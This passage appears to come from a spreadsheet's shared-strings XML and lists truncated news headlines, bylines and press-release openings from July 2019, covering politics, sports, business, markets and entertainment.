    <t>Calderdale's drivers remain on board the green revolution as government cuts to subsidies have not quashed their enthusiasm for electric...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / July 26, 2019 / Veoneer, Inc. (NYSE: VNE SDB) will be discussing their earnings results in their 2019 Second...</t>
  </si>
  <si>
    <t>Anna Hayes</t>
  </si>
  <si>
    <t>Standards Australia has drawn up a draft installation standard for battery storage devices. Standards Australia has been working with...</t>
  </si>
  <si>
    <t>OAKLAND, Calif. (AP) — A judge has cut a jury award in a lawsuit that found that Monsanto's Roundup herbicide caused cancer in a California...</t>
  </si>
  <si>
    <t>GILROY, Calif. (AP) — The Latest on a shooting at a food festival in Northern California (all times local): 1:07 p.m. One of the three...</t>
  </si>
  <si>
    <t>Constitutional Drunk</t>
  </si>
  <si>
    <t>Tucker Carlson gave a key-note address at the National Conservative Conference. Known for his off the cuff, and brutally honest remarks, a...</t>
  </si>
  <si>
    <t>Jay Cohen, Ap Sports Writer</t>
  </si>
  <si>
    <t>FILE - In this May 22, 2016, file photo, United States attacker Kaleigh Gilchrist moves the ball during a women's exhibition water polo...</t>
  </si>
  <si>
    <t>TEL AVIV, Israel and ATLANTA, July 24, 2019 /PRNewswire-PRWeb/ -- IRONSCALES, the world's first automated phishing prevention, detection...</t>
  </si>
  <si>
    <t>RIO DE JANEIRO (AP) — Flamengo midfielder Diego will undergo surgery for a left ankle fracture. The Brazilian team says the former Porto,...</t>
  </si>
  <si>
    <t>The Air Force general nominated to be the nation's number two military officer flatly denied allegations of sexual misconduct Tuesday, and...</t>
  </si>
  <si>
    <t>John</t>
  </si>
  <si>
    <t>When we discussed the St. Louis Blues’ offseason needs back in June, the first focus was power play help. At the time, we noted that the...</t>
  </si>
  <si>
    <t>(StatePoint) Many businesses -- and almost all employees -- would like it if there was a way for companies to help members of their...</t>
  </si>
  <si>
    <t>NEWS ANNOUNCEMENT FOR IMMEDIATE RELEASE Presenting Company’s value-add advanced specialized technology platforms and key...</t>
  </si>
  <si>
    <t>The CAN Group has announced that it has been appointed to represent ex-professional rugby player Tom Trotter. Known for his sports...</t>
  </si>
  <si>
    <t>, (AP) -- Ronald Carreno hit a run-scoring single in the seventh inning, leading the DSL Angels to a 16-12 win over the DSL Twins on...</t>
  </si>
  <si>
    <t>By: JOHN SEEWER, Associated Press</t>
  </si>
  <si>
    <t>TOLEDO, Ohio (AP) - Lawmakers in the Ohio House have approved a roughly $1 billion financial rescue for the state's two nuclear power...</t>
  </si>
  <si>
    <t>Jacob Pramuk</t>
  </si>
  <si>
    <t>The House on Thursday passed a bill to raise the U.S. debt ceiling and set budget levels for two years, taking a step toward avoiding...</t>
  </si>
  <si>
    <t>Nick Bond@bondnickbond</t>
  </si>
  <si>
    <t>On holiday in Italy, Hamish Blake devised a secret plan that left his wife speechless — and the comedian crying with laughter.</t>
  </si>
  <si>
    <t>Madison Lennon</t>
  </si>
  <si>
    <t>Eva Longoria is an American actress, producer, philanthropist, activist, director, and businesswoman. She's one of those women you see and...</t>
  </si>
  <si>
    <t>Jill Lawless and Danica Kirka</t>
  </si>
  <si>
    <t>Boris Johnson has become Britain's new prime minister, vowing to lead the UK out of the European Union, "no ifs, ands or buts". Standing...</t>
  </si>
  <si>
    <t>Justin Chadwick and Roger Vaughan</t>
  </si>
  <si>
    <t>Fremantle have sprung a selection surprise, recalling small forward Hayden Ballantyne for Sunday's must-win AFL game against the Western...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / July 31, 2019 / UltrAlpha (UAT), a professional digital asset management service platform, announced the public...</t>
  </si>
  <si>
    <t>Brian Mann (Adirondack Bureau Chief)</t>
  </si>
  <si>
    <t>North Country Congresswoman Elise Stefanik says she doesn’t believe President Trump’s twitter attacks against black and Hispanic Democratic...</t>
  </si>
  <si>
    <t>Two-time grand final winner James Maloney is set to finish up with Penrith at the end of the 2019 NRL to join UK Super League club...</t>
  </si>
  <si>
    <t>SHELTON, Conn., July 22, 2019 /PRNewswire-PRWeb/ -- TABS Analytics today announced that Arthur (Art) B. Drogue, who held executive roles at...</t>
  </si>
  <si>
    <t>By BloodHorse Staff</t>
  </si>
  <si>
    <t>Rake on win, place, and show wagers will be set at 16%.</t>
  </si>
  <si>
    <t>By YANAN WANG Associated Press</t>
  </si>
  <si>
    <t>BEIJING (AP) — Officials from China's northwestern Xinjiang region said Tuesday that most of the people who were in the area's...</t>
  </si>
  <si>
    <t>Ben Franklin Financial, Inc. (OTC PINK: BFFI) (the “Company”), the holding company for Ben Franklin Bank of Illinois, today announced that...</t>
  </si>
  <si>
    <t>0 comment Scottish Tory leader Ruth Davidson has conceded there is “scepticism” about Boris Johnson becoming the UK’s next prime minister...</t>
  </si>
  <si>
    <t>Hannah Brown‘s love story isn’t quite over yet! On Tuesday night, we saw The Bachelorette‘s journey to find love end with an engagement...</t>
  </si>
  <si>
    <t>CEDARHURST, NY / ACCESSWIRE / July 31, 2019 / The securities litigation law firm of Kuznicki Law PLLC issues the following notice on behalf...</t>
  </si>
  <si>
    <t>Damian Calhoun</t>
  </si>
  <si>
    <t>The relationship between teams in Major League Soccer and Liga MX is a complicated yet evolving one. On the field, the leagues have been...</t>
  </si>
  <si>
    <t>Aaron Dillon and Danielle Albano ANDERSON, Ind. — Indiana State Police (ISP) have arrested two people in Anderson for possession of a...</t>
  </si>
  <si>
    <t>5 unique brands join together to form a new ground-breaking business collective Seuss+</t>
  </si>
  <si>
    <t>5 mins ago in Local</t>
  </si>
  <si>
    <t>MANALAPAN, N.J., July 31, 2019 (GLOBE NEWSWIRE) -- Maple Tech, a provider of modern, cloud-based, core administration (policy, billing...</t>
  </si>
  <si>
    <t>LOS ANGELES, CA / ACCESSWIRE / July 23, 2019 / Autoinsurancequotesave.com has released a new blog post that explains to its customers the...</t>
  </si>
  <si>
    <t>by Dom Tripolone</t>
  </si>
  <si>
    <t>A James Bond super fan could soon have a licence to thrill. The Aston Martin DB5 from the movie's Goldfinger and Thunderball is up for...</t>
  </si>
  <si>
    <t>Greg Isaacson</t>
  </si>
  <si>
    <t>Singapore-based investors were highly active in U.S. commercial property markets last year, including CapitaLand, which scooped up a...</t>
  </si>
  <si>
    <t>Terry Koshan</t>
  </si>
  <si>
    <t>The Maple Leafs continue to add to their roster as the dog days of summer drag on.Forward Garrett Wilson has signed with the Leafs, a...</t>
  </si>
  <si>
    <t>Jacki Weaver. Jacki Weaver is set to star alongside Naomi Watts and The Walking Dead’s Andrew Lincoln in Penguin Bloom, the adaptation of...</t>
  </si>
  <si>
    <t>Jackpot Rising Inc., an innovator and provider of interactive software solutions for competitive gaming and eSports tournaments,...</t>
  </si>
  <si>
    <t>SOURCE Reportlinker NEW YORK, July 31, 2019 /PRNewswire/ -- Stadium Lighting market worldwide is projected to grow by US$253.5 Million,...</t>
  </si>
  <si>
    <t>Jocelyne Lamoureux-Davidson and Monique Lamoureux-Morando, U.S. Women’s Ice Hockey team members and 2018 Olympic gold medalists, today...</t>
  </si>
  <si>
    <t>Pune, India, July 30, 2019 (GLOBE NEWSWIRE) -- The Global Oligonucleotide Synthesis Market Is Expected to Grow Significantly In The...</t>
  </si>
  <si>
    <t>BWW News Desk</t>
  </si>
  <si>
    <t>Due to overwhelming ticket demand, Hannah Gadsby'S latest solo show, Douglas, has extended its New York engagement for a second time,...</t>
  </si>
  <si>
    <t>DUBLIN, July 22, 2019 /PRNewswire/ -- The "Millet Market - Segmented by Geography - Growth, Trends, and Forecast (2019 - 2024)" report has...</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.47 in 2019 Q1. Its up 0.41, from 1.06 in 2018Q4. It is positive, as 35 investors sold NEM shares while...</t>
  </si>
  <si>
    <t>Stuart Derdeyn</t>
  </si>
  <si>
    <t>Mumford &amp; Sons When: Aug. 7, 8 p.m. Where: B.C. Place Tickets and info: From $59.50, at ticketmaster.ca Mumford &amp; Sons performing in...</t>
  </si>
  <si>
    <t>Matt Coughlan</t>
  </si>
  <si>
    <t>Labor senator Tony Sheldon has called for a new tax to be slapped on digital giants, urging Australia to follow France's lead in cracking...</t>
  </si>
  <si>
    <t>German football legend Franz Beckenbauer is in disarray amid a lack of mental capabilities that could prevent him from judging for World...</t>
  </si>
  <si>
    <t>AP</t>
  </si>
  <si>
    <t>CHICAGO — The slugging Minnesota Twins set another record Friday night. The players are enjoying the show. Nelson Cruz went deep for the...</t>
  </si>
  <si>
    <t>Messaging Architects, an eMazzanti Technologies Company and information governance consultant, discusses the challenges and benefits of...</t>
  </si>
  <si>
    <t>BERLIN, July 29, 2019 (Newswire) - To combat the menace of fossil fuel pollution, German cities across the country have put diesel bans in...</t>
  </si>
  <si>
    <t>'Parks are meant for gatherings like that and what better way to facilitate that than with music.'</t>
  </si>
  <si>
    <t>Tercius</t>
  </si>
  <si>
    <t>Logitech HD Pro Webcam | $40 | Amazon Graphic: Tercius Bufete Best Tech DealsThe best tech deals from around the web, updated daily. ...</t>
  </si>
  <si>
    <t>Investors may be taking a closer look at shares of Deckers Outdoor Corporation (NYSE:DECK). Sometimes the stock market can be frustrating,...</t>
  </si>
  <si>
    <t>Tyrone Williams</t>
  </si>
  <si>
    <t>Equities analysts forecast that DURECT Co. (NASDAQ:DRRX) will announce sales of $4.05 million for the current quarter, Zacks Investment...</t>
  </si>
  <si>
    <t>and consequent implication of the clarity of the project financing for the development of the Sangdong Mine. If the application and...</t>
  </si>
  <si>
    <t>In this Monday, July 15, 2019 photo, pop star-turned-opposition lawmaker Bobi Wine, whose real name is Kyagulanyi Ssentamu, is...</t>
  </si>
  <si>
    <t>A piece of H&amp;M’s former home in Herald Square will soon be turned into a beauty guru’s dream. Ulta Beauty has just signed a 12,000...</t>
  </si>
  <si>
    <t>U.S. weapons maker Raytheon Co on Thursday reported a better-than-expected second-quarter profit and raised its full-year profit and sales...</t>
  </si>
  <si>
    <t>QUITO (Reuters) – The government of a key mining province in southern Ecuador has proposed a popular referendum on the development of new...</t>
  </si>
  <si>
    <t>Margot has not generally been done right by Chanel, so I’m happy to see that she snagged one of the simpler back-to-basics designs from...</t>
  </si>
  <si>
    <t>Staff Report From Metro Atlanta CEO</t>
  </si>
  <si>
    <t>Home › News › Jul 2019 Staff Report From Metro Atlanta CEO Tuesday, July 23rd, 2019 Join us on Friday, August 9 for Cobb Executive...</t>
  </si>
  <si>
    <t>An unmanned Russian spaceship carrying tons of supplies to the International Space Station has docked with the orbiting laboratory. The...</t>
  </si>
  <si>
    <t>Justin Leger NBC Sports Boston</t>
  </si>
  <si>
    <t>When Andrew Cashner joined the Red Sox via trade earlier this month, he made one thing clear: he couldn't wait to face the Yankees. The...</t>
  </si>
  <si>
    <t>STOCKHOLM (Reuters) – U.S. rapper A$AP Rocky will appear in a Swedish court on Tuesday for the first day of his trial for assault that has...</t>
  </si>
  <si>
    <t>UAE - July 25, 2019 - iPhone is very much misunderstood and an enigma to behold for many. False, a media organization based in the United...</t>
  </si>
  <si>
    <t>COLUMBUS, Ohio, July 25, 2019 /PRNewswire/ -- Huntington Bancshares Incorporated (Nasdaq: HBAN; www.huntington.com) reported net income for...</t>
  </si>
  <si>
    <t>The scene is now clear after the Cobb County Police Department investigated a bomb threat at the Costco in Kennesaw. Police said officers...</t>
  </si>
  <si>
    <t>Global “Tower Crane Market”2019 Research report provides information regarding market size, share, trends, growth, cost structure,...</t>
  </si>
  <si>
    <t>Clark Linder</t>
  </si>
  <si>
    <t>Wall Street analysts expect that Campbell Soup (NYSE:CPB) will announce sales of $2.00 billion for the current fiscal quarter, Zacks...</t>
  </si>
  <si>
    <t>The Supreme Court has cleared the way for the Trump administration to tap Pentagon funds to build sections of a border wall with Mexico</t>
  </si>
  <si>
    <t>Adrian Padeanu</t>
  </si>
  <si>
    <t>The curvaceous retro-styled supercar takes after Jaguar's one-off race car from 1966.</t>
  </si>
  <si>
    <t>WENN - World Entertainment News NetworkMore from WENN - World Entertainment News Network</t>
  </si>
  <si>
    <t>Nicole Murphy has insisted she and Antoine Fuqua are just “family friends” after being pictured in a passionate embrace with the married...</t>
  </si>
  <si>
    <t>America’s largest civil rights organization working to achieve gay, lesbian, bisexual and transgender equality. By inspiring and engaging...</t>
  </si>
  <si>
    <t>by The Associated Press</t>
  </si>
  <si>
    <t>STORRS, Conn. — The University of Connecticut has agreed to pay a $17 million exit fee to the American Athletic Conference, so the school...</t>
  </si>
  <si>
    <t>The Automotive Hydrostatic Fan Drive System Market report categories the market by globally based on size, share, Revenue, key...</t>
  </si>
  <si>
    <t>Itbayat, part of the Batanes Islands, has a population of about 2,800 people and lies in the Luzon Strait that separates the Philippines and Taiwan.</t>
  </si>
  <si>
    <t>MANILA, Philippines (AP) — Two strong earthquakes hours apart struck a group of sparsely populated islands in the Luzon Strait in the...</t>
  </si>
  <si>
    <t>NEW YORK, July 24, 2019 /PRNewswire/ -- MUFG today announced that Keith Allman will be joining the firm on August 14 as Managing Director...</t>
  </si>
  <si>
    <t>Rosalind Renshaw</t>
  </si>
  <si>
    <t>An agent who is struggling to keep his smallest branch going and took it off Rightmove has been told that he must either shut it or make it...</t>
  </si>
  <si>
    <t>The "United States Data Analytics Market: Prospects, Trends Analysis, Market Size and Forecasts up to 2024" report has been added to...</t>
  </si>
  <si>
    <t>STOCKHOLM, July 26, 2019 /PRNewswire/ -- SCA has appointed Katarina Nilsson new Senior Vice President Legal Affairs and General Counsel....</t>
  </si>
  <si>
    <t>Mike Montgomery makes his first start for the Royals...</t>
  </si>
  <si>
    <t>Important speaker addition to the agriculture, conservation and food industry representatives converging on Washington, D.C., tomorrow. Key...</t>
  </si>
  <si>
    <t>The "Top Ten Medical Plastic Producers" report has been added to ResearchAndMarkets.com's offering. The scope of this report is focused on...</t>
  </si>
  <si>
    <t>Equity uplift Fed's policy stance keeps the music playing  JOHN PLENDER, PAGE 26</t>
  </si>
  <si>
    <t>Sameer Joshi</t>
  </si>
  <si>
    <t>Premium Market Insights reports titled “Supercapacitor Market” and forecast to 2025 gives a detailed analysis of the market with key...</t>
  </si>
  <si>
    <t>The "Swimwear Market - Growth, Trends, and Forecast (2019 - 2024)" report has been added to ResearchAndMarkets.com's offering. Global...</t>
  </si>
  <si>
    <t>Emily Corwin</t>
  </si>
  <si>
    <t>Jarvis Green is a 38-year-old actor, artistic director, and founder of JAG Productions, an African American theater company based in the...</t>
  </si>
  <si>
    <t>Digital Printing Packaging market worldwide is projected to grow by US$19. 1 Billion, guided by a compounded growth of 12.7%. Staying on...</t>
  </si>
  <si>
    <t>NEW YORK — Meek Mill is in a Jay-Z state of mind: The Philadelphia rapper-turned-entrepreneur is launching a new record label in a joint...</t>
  </si>
  <si>
    <t>WINAMAC, Ind., July 26, 2019 /PRNewswire/ -- BraunAbility, in partnership with 17 mobility dealership locations across the U.S., will be...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 24, 2019 (GLOBE NEWSWIRE) -- Acumen Research and Consulting, Recently Published Report On “Idiopathic Pulmonary...</t>
  </si>
  <si>
    <t>U.S. buyout fund Blackstone Group Inc is expected to announce the merger of its majority-owned financial data firm Refinitiv with the...</t>
  </si>
  <si>
    <t>National Weather Service</t>
  </si>
  <si>
    <t>The National Weather Service in Tucson has issued a * Flash Flood Watch for a portion of Southeast Arizona, including the following areas,...</t>
  </si>
  <si>
    <t>Kellie Sanchez</t>
  </si>
  <si>
    <t>WALTON COUNTY, Fla. (WJHG/WECP) - Walton County commissioners are hitting pause on buying more property. In the meantime, the Tourist...</t>
  </si>
  <si>
    <t>MetLife, Inc. (NYSE: MET) today announced that Executive Vice President, Chief Financial Officer and Treasurer John McCallion has provided...</t>
  </si>
  <si>
    <t>William Marriott</t>
  </si>
  <si>
    <t>She has opened up about her experience</t>
  </si>
  <si>
    <t>- Record Quarterly Net Sales of $88.7 million- Record Quarterly Net Income of $9.4 million- Record Quarterly Diluted Earnings Per Share of...</t>
  </si>
  <si>
    <t>BRIDGEVIEW, Sick. – At his Monday press convention forward of the opening recreation of the inaugural Leagues Cup, Chicago Fire head coach...</t>
  </si>
  <si>
    <t>Jim Casey</t>
  </si>
  <si>
    <t>Cole Swindell is trying to score the ninth No. 1 hit of his career with his new single, “Love You Too Late,” which is currently No. 16 on...</t>
  </si>
  <si>
    <t>LOS ANGELES, July 22, 2019 /PRNewswire/ -- RBB Bancorp (NASDAQ:RBB) and its subsidiaries, Royal Business Bank ("the Bank") and RBB Asset...</t>
  </si>
  <si>
    <t>SOURCE Revionics, Inc. Sweden's Largest Private Pharmacy Chain Builds on Increased Pricing Agility to Enhance Promotion Effectiveness...</t>
  </si>
  <si>
    <t>SACRAMENTO, Calif., July 22, 2019 /PRNewswire/ -- Officer Kyle Nathan Henricksen is the recipient of the 2019 Mark Dunakin Award for...</t>
  </si>
  <si>
    <t>Smart Cinema USA Officially Rolled Out in North America Dallas, United States - July 26, 2019 /MarketersMedia/ — On July 25, Smart Cinema...</t>
  </si>
  <si>
    <t>SEATTLE, July 30, 2019 /PRNewswire-PRWeb/ -- Atavus, the leader in football coach education and tackling assessment, announced today that...</t>
  </si>
  <si>
    <t>by The Canadian Press</t>
  </si>
  <si>
    <t>CALGARY — The Canadian oilfield services sector is expected to continue to suffer as it enters the summer drilling season despite recent...</t>
  </si>
  <si>
    <t>Union County Sheriff's Office reported Watkins was captured in Lexington County, SC early Friday morning.</t>
  </si>
  <si>
    <t>Nick Cunningham</t>
  </si>
  <si>
    <t>Halliburton is cutting its workforce and shelving fracking equipment amid a slowdown in the U.S. shale industry. The oilfield services...</t>
  </si>
  <si>
    <t>Comcast Corporation (Nasdaq: CMCSA), a leading cable, entertainment and communications company, announced that its Board of Directors...</t>
  </si>
  <si>
    <t>Josh Enomoto, InvestorPlace</t>
  </si>
  <si>
    <t>InvestorPlace - Stock Market News, Stock Advice &amp; Trading Tips It’s inevitable: no matter where you turn, growth stocks generate the most...</t>
  </si>
  <si>
    <t>ATHENS, Greece Greek authorities say an earthquake with preliminary magnitude 5.2 has struck the southern resort island of Crete but no...</t>
  </si>
  <si>
    <t>HALIFAX, Nova Scotia &amp; BROOKLYN, N.Y., July 25, 2019 (GLOBE NEWSWIRE) -- The Trailer Park Boys and Coney Island Saucery have joined forces...</t>
  </si>
  <si>
    <t>Holly Keys</t>
  </si>
  <si>
    <t>The construction contract for Tasmania’s $5 million East Tamar Highway – Mowbray Connector Intersection Upgrade has been awarded to Shaw...</t>
  </si>
  <si>
    <t>ADELL, Ore. (AP) — A 73-year-old man who was stranded in the remote Oregon high desert for four days with his two dogs was rescued when a...</t>
  </si>
  <si>
    <t>The Center Square</t>
  </si>
  <si>
    <t>More than three in four Americans think that parents should be able to decide which public school their child attends, according to a new...</t>
  </si>
  <si>
    <t>siteadmin</t>
  </si>
  <si>
    <t>A Soul-sonic rhapsody of word, sound and power that comes your way Monday nights. Hosted and produced by Greg Bridges. Playlist...</t>
  </si>
  <si>
    <t>vnexpress</t>
  </si>
  <si>
    <t>All 44.21 million shares in the leading producer of cooking oil, better known as Vocarimex, will be publicly auctioned on August 15 and...</t>
  </si>
  <si>
    <t>VALLEY COTTAGE, N.Y. , July 23, 2019 (GLOBE NEWSWIRE) -- Future Market Insights (FMI), in its latest study, outlines the growth trail...</t>
  </si>
  <si>
    <t>Why pick just one? Hollywood donors fund numerous Democrats in bid to beat Trump</t>
  </si>
  <si>
    <t>Send2Press Newswire</t>
  </si>
  <si>
    <t>, Jul 31, 2019 (SEND2PRESS NEWSWIRE) -- OpenClose(R), an industry-leading multi-channel loan origination system (LOS) and digital mortgage...</t>
  </si>
  <si>
    <t>SOURCE: HanesBrands More than 200 of the company’s retail outlets are collecting new and gently used bras to assist the nonprofit in...</t>
  </si>
  <si>
    <t>Almost 70,000 vehicles in the UK are affected by problem with plastic part in engine</t>
  </si>
  <si>
    <t>BREAKING NEWS 3 dead, including 2 children, in shooting at California garlic festival - more &gt;&gt; First phase rolled out includes 600 items...</t>
  </si>
  <si>
    <t>SELBYVILLE, Del., July 30, 2019 /PRNewswire/ -- The pet tech market is poised to rise from $4.5 billion in 2018 to over $20 billion by 2025...</t>
  </si>
  <si>
    <t>DUBLIN, July 22, 2019 /PRNewswire/ -- The "Micro Battery Market by Type (Thin Film, Printed, Solid State Chip Battery), Capacity,...</t>
  </si>
  <si>
    <t>Brent Sawyer</t>
  </si>
  <si>
    <t>Gemini Dollar (CURRENCY:GUSD) traded 0.6% lower against the US dollar during the 24-hour period ending at 0:00 AM ET on July 23rd. One...</t>
  </si>
  <si>
    <t>(Reuters) - Software and consulting company First Derivatives Plc's (L:FRST) Chief Executive Brian Conlon died on Sunday, aged 53,...</t>
  </si>
  <si>
    <t>NEW YORK, July 25, 2019 (GLOBE NEWSWIRE) -- Zhang Investor Law announces a class action lawsuit on behalf of shareholders who bought...</t>
  </si>
  <si>
    <t>Yumi Kim</t>
  </si>
  <si>
    <t>It was reported that a lawyer named Gu Hye Min will file a complaint with the Seoul Central District Prosecutor's Office against Mnet and...</t>
  </si>
  <si>
    <t>Karen Sweeney</t>
  </si>
  <si>
    <t>A jailed gangland getaway driver in prison for murder could soon get a taste of freedom due to turncoat 'Lawyer X', Nicola Gobbo. Faruk...</t>
  </si>
  <si>
    <t>By George King</t>
  </si>
  <si>
    <t>AN HISTORIC Halstead theatre will take its first foray into both the future and the world of technological advancements tomorrow when it...</t>
  </si>
  <si>
    <t>As per the latest report by IMARC Group, titled “Office Furniture Market: Global Industry Trends, Share, Size, Growth, Opportunity and...</t>
  </si>
  <si>
    <t>Jonathan Drew, Associated Press</t>
  </si>
  <si>
    <t>RALEIGH, N.C. (AP) — A ballot fraud investigation has produced new felony charges against the political operative at the center of a...</t>
  </si>
  <si>
    <t>Donald Trump Jr., Jeffrey Epstein &amp; Kid Rock real estate news. July's celebrity and trending Top 10 Real Estate News is featured at...</t>
  </si>
  <si>
    <t>Oil prices nudged higher on Thursday amid Middle East tensions and after weekly U.S. crude stocks dropped more than expected, but gains...</t>
  </si>
  <si>
    <t>By Ryan Gaydos</t>
  </si>
  <si>
    <t>Beckham told GQ magazine he believes he was the “main reason” the Giants kept receiving primetime coverage despite missing the playoffs...</t>
  </si>
  <si>
    <t>The dog which spent a week lying by Backroad Anthem singer Craig Strickland’s body for a week following his death on a hunting trip at the...</t>
  </si>
  <si>
    <t>NEW YORK, July 29, 2019 (GLOBE NEWSWIRE) -- The global small joint reconstructive implants market is expected to generate $10.1 billion...</t>
  </si>
  <si>
    <t>Shannon Antinori, Patch Staff</t>
  </si>
  <si>
    <t>The 2-1/2-year-old was found within minutes of being reported missing after absconding in his battery-powered John Deere.</t>
  </si>
  <si>
    <t>Max Byerly</t>
  </si>
  <si>
    <t>CENTRAL TRUST Co increased its position in shares of Duke Energy Corp (NYSE:DUK) by 9.2% during the 2nd quarter, according to its most...</t>
  </si>
  <si>
    <t>Join us at celebrating 10 years of the Boston Local Food Festival. For one spectacular day each year, the Sustainable Business Network of...</t>
  </si>
  <si>
    <t>Milciclib was well tolerated and no drug related deaths were reported28 out of 31 treated patients were evaluable, with 14 patients...</t>
  </si>
  <si>
    <t>If you’re watching this and are anything like me, and the millions of other college grads in this country, there’s a good chance that...</t>
  </si>
  <si>
    <t>Will Thorne, provided by</t>
  </si>
  <si>
    <t>PBS president and CEO Paula Kerger has signed a 5-year contract extension with the company. She was already the longest-running PBS...</t>
  </si>
  <si>
    <t>DOVER, Del., July 23, 2019 /PRNewswire/ -- This week, Meghan A. Adams, appointed by Governor Carney and confirmed by the State Senate, left...</t>
  </si>
  <si>
    <t>New Orleans, LA, July 25, 2019 --(PR.com)-- Cara Stone, LLP (“Cara Stone”), the nation’s fastest growing capital markets law firm, released...</t>
  </si>
  <si>
    <t>Jean Vivola,</t>
  </si>
  <si>
    <t>Today will be mostly sunny with low humidity and high temperatures in the mid-80s. An isolated, pop-up shower or storm is possible. Tonight...</t>
  </si>
  <si>
    <t>RMI Fusion, a subsidiary of Response Mine Interactive, announced this week that it is growing its call center staffing by 80%.</t>
  </si>
  <si>
    <t>PALM BEACH, Florida, July 24, 2019 /PRNewswire/ -- Almost everyone has heard the term "CBD", even people who have never smoked recreational...</t>
  </si>
  <si>
    <t>Warren Barnsley</t>
  </si>
  <si>
    <t>Former Ipswich mayor Paul Pisasale has been found guilty of extortion by posing as a private investigator to demand money from a Sydney...</t>
  </si>
  <si>
    <t>NEW YORK, July 22, 2019 /PRNewswire/ -- Future US, the leading information and event producer for professional communications,...</t>
  </si>
  <si>
    <t>Intel Corp forecast current-quarter profit and revenue above estimates and raised its full-year revenue forecast on Thursday, allaying...</t>
  </si>
  <si>
    <t>By Tom Utley for the Daily Mail</t>
  </si>
  <si>
    <t>This is the story of an heroic struggle for justice against the rubbish-bin Stasi and a rapacious Labour council. In this case, the tragic...</t>
  </si>
  <si>
    <t>Sara Berlinger</t>
  </si>
  <si>
    <t>Tonight we’re learning more about the McConnell Airman killed after a shooting last weekend. An airman tells KSN he and 20-year-old...</t>
  </si>
  <si>
    <t>Forty years after Microsoft's founding, Bill Gates has said the biggest change is still ahead in the technology business. And they will be...</t>
  </si>
  <si>
    <t>Tech conglomerate SoftBank Group Corp will invest $40 billion in its forthcoming second Vision Fund, the Wall Street Journal reported on...</t>
  </si>
  <si>
    <t>LIMA, Peru, July 29, 2019 /PRNewswire/ -- Intercorp Perú Ltd., a Peru-based holding company organized under the laws of The Bahamas...</t>
  </si>
  <si>
    <t>6:45 a.m., dawn: It sounded like a gas well decompressing, three loud “pssts,” with conviction and presence. I thought it was a bear, as I...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — The Latest on the videotaped dousing of NYC patrol officers (all times local): 7:35 p.m. Police have arrested three men in...</t>
  </si>
  <si>
    <t>The home video services industry is undergoing a significant evolution, as younger consumers increasingly edge away from traditional cable TV and gravitate toward streaming services that are viewable on mobile devices End-to-end network technology provider Spectrum Global Solutions has positioned itself well to meet the evolving industry’s infrastructure and ongoing maintenance needs The company serves clients large and small throughout the United States and its territories, including telecommunications giants such as Ericsson, Nokia, Sprint, AT&amp;T and Verizon SGSI’s acquisition of German energy infrastructure technology company WaveTech GmbH further positions its operations to respond to clients on an international scale Online video streaming services were introduced to the television-viewing market as an alternate means of watching programming that hadn’t been DVR’d, sometimes providing supplementary content as well, but streaming services have since begun to evolve into content-providing solutions with gravitas, and current global telecommunications industry plans to begin rolling out the infrastructure for a 5G network evolution have further validated a shifting business focus toward over-the-top (OTT) services as well as cable TV. Telecommunications network service provider Spectrum Global Solutions Inc. (OTCQB: SGSI) delivers network establishment and maintenance experience end-to-end, fulfilling contracts on a one-time service-needed basis as well as… Read More&gt;&gt; NOTE TO INVESTORS: The latest news and updates relating to SGSI are available in the company’s newsroom at http://nnw.fm/SGSI About NetworkNewsWire NetworkNewsWire (NNW) is a financial news and content distribution company that provides (1) access to a network of wire services via NetworkWire to reach all target markets, industries and demographics in the most effective manner possible, (2) article and editorial syndication to 5,000+ news outlets (3), enhanced press release services to ensure maximum impact, (4) social media distribution via the Investor Brand Network (IBN) to nearly 2 million followers, (5) a full array of corporate communications solutions, and (6) a total news coverage solution with NNW Prime. As a multifaceted organization with an extensive team of contributing journalists and writers, NNW is uniquely positioned to best serve private and public companies that desire to reach a wide audience of investors, consumers, journalists and the general public. By cutting through the overload of information in today’s market, NNW brings its clients unparalleled visibility, recognition and brand awareness. NNW is where news, content and information converge. To receive SMS text alerts from NetworkNewsWire, text “STOCKS” to 77948 (U.S. Mobile Phones Only) For more information, please visit https://www.NetworkNewsWire.com Please see full terms of use and disclaimers on the NetworkNewsWire website applicable to all content provided by NNW, wherever published or re-published: http://NNW.fm/Disclaimer NetworkNewsWire (NNW) New York, New York www.NetworkNewsWire.com 212.418.1217 Office Editor@NetworkNewsWire.com</t>
  </si>
  <si>
    <t>afp.com</t>
  </si>
  <si>
    <t>These days whenever Ethiopia's Prime Minister Abiy Ahmed appears in public, he removes his jacket, rolls up his sleeves, grabs a shovel and...</t>
  </si>
  <si>
    <t>Perla Kantarjian</t>
  </si>
  <si>
    <t>Among the various themes of the festival, many of the meticulously crafted details revolve around a fairytale feel</t>
  </si>
  <si>
    <t>BRUSSELS (AP) — The Latest on Europe's heat wave (all times local): 12:50 p.m. Travelers are facing a second day of disruption in Britain...</t>
  </si>
  <si>
    <t>DALLAS, July 26, 2019 /PRNewswire/ -- Dean Foods Company (NYSE: DF) today announced that Eric Beringause has been appointed President and...</t>
  </si>
  <si>
    <t>HOUSTON - 07-30-2019 (PRDistribution.com) — Ondiflo, a blockchain platform for the oil and gas industry, today announced the successful...</t>
  </si>
  <si>
    <t>© Reuters. Australia, NZ shares slip as ECB puts off rate cut * Financials fall 0.7% but up 1.8% for the week * Miners post biggest weekly...</t>
  </si>
  <si>
    <t>Jordan Lieberman</t>
  </si>
  <si>
    <t>Enjoying this article? Subscribe to our weekly C&amp;E Newsletter &amp; bi-weekly CampaignTech Newsletter by clicking here. Fifteen years ago, I...</t>
  </si>
  <si>
    <t>"CBS This Morning" has obtained jarring new video of the moment a semi-truck plowed into a church van killing seven people in January near...</t>
  </si>
  <si>
    <t>NEW YORK, July 31, 2019 (GLOBE NEWSWIRE) -- Halper Sadeh LLP, a global investor rights law firm, reminds investors that it is...</t>
  </si>
  <si>
    <t>Originally posted on https://wasserstein-home.com/blogs/smart-home/introducing-the-ring-door-view-cam Smart doorbells have been around...</t>
  </si>
  <si>
    <t>President Vladimir Putin has led Russia’s first major naval parade in years, a day after hundreds of anti-government protesters were...</t>
  </si>
  <si>
    <t>LONDON (AP) — The head of Britain's leading charity funding scientific research has written to new Prime Minister Boris Johnson warning...</t>
  </si>
  <si>
    <t>OTTAWA — The federal government is investing $85 million into an advanced satellite technology designed to expand access to affordable,...</t>
  </si>
  <si>
    <t>Andrew James</t>
  </si>
